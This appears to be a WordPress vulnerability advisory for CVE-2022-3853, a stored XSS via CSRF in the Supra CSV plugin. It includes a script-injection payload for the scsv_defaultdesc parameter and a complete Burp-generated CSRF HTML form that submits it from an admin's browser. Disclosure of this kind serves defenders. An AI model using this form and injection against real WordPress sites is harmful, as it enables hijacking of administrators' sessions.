WordPress Plugin Vulnerabilities

Supra CSV <= 4.0.3 - Stored Cross-Site Scripting via CSRF

Description

Cross-site Scripting (XSS) is a client-side code injection attack. The attacker aims to execute malicious scripts in a web browser of the victim by including malicious code in a legitimate web page or web application.
I have found a Stored XSS on the plugin Supra CSV Version: 4.0.3. Here is the official page of the plugin given below
https://wordpress.org/plugins/supra-csv-parser

Proof of Concept

Step to reproduce:
Step1: Download and install the plugin
Step2:Activate and go to the setting of the plugin.
Step3:Give the details and intercept the request using burp suite.
Step4:The parameter "scsv_defaultdesc="is vulnerable to XSS with the below payload
“ xss</textarea></p><script>alert(1)</script>// ”
Step5:From this script we can see the plugin is vulnerable to stored XSS.
Step6:Generate CSRF payload for the request and send it to the victim.
Step7: CSRF payload is given below
<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://127.0.0.1/wordpress/wp-admin/admin.php?page=supra_csv_admin" method="POST">
      <input type="hidden" name="scsv_wpname" value="xss1<>"&apos;/" />
      <input type="hidden" name="scsv_wppass" value="xss2<>"&apos;/" />
      <input type="hidden" name="scsv_autopub" value="0" />
      <input type="hidden" name="scsv_posttype" value="post" />
      <input type="hidden" name="scsv_defaulttitle" value="xss3<>"&apos;/" />
      <input type="hidden" name="scsv_defaultdesc" value="xss4</textarea></p><script>alert(2)</script>//" />
      <input type="hidden" name="scsv_custom_terms" value="xss5<>"&apos;/" />
      <input type="hidden" name="scsv_csv_settings[delimiter]" value=",xss6<>"&apos;/" />
      <input type="hidden" name="scsv_csv_settings[enclosure]" value=""xss7<>"&apos;/" />
      <input type="hidden" name="scsv_csv_settings[escape]" value="\" />
      <input type="hidden" name="scsv_line_maxlen" value="1000" />
      <input type="hidden" name="scsv_submit" value="Update Options" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Step8: Stored XSS is successfully executed with CSRF vulnerability.

Affects Plugins

Plugin icon
supra-csv-parser
No known fix

References

CVE
CVE-2022-3853

Classification

Type
XSS
OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79
CVSS
6.1 (medium)

Miscellaneous

Original Researcher
Rahul selvakumar
Submitter
Rahul selvakumar
Verified
Yes
WPVDB ID
c2bc7d23-5bfd-481c-b42b-da7ee80d9514

Timeline

Publicly Published
2022-12-05 (about 1 years ago)
Added
2022-11-21 (about 1 years ago)
Last Updated
2022-11-21 (about 1 years ago)

Other

Published
Title
Published
2024-04-25
Title
Newsletter Popup <= 1.2 - Admin+ Stored XSS
Published
2021-09-28
Title
Connections Business Directory < 10.4.3 - Admin+ Stored Cross-Site Scripting
Published
2017-05-16
Title
WordPress Button Plugin MaxButtons <= 6.18 - Authenticated Cross-Site Scripting (XSS)
Published
2014-08-01
Title
ThinkIT <= 0.2 - wp-admin/admin.php toitcf_current_id Parameter XSS
Published
2014-05-28
Title
WooCommerce Swipe <= 2.7.1 - Unauthenticated Reflected XSS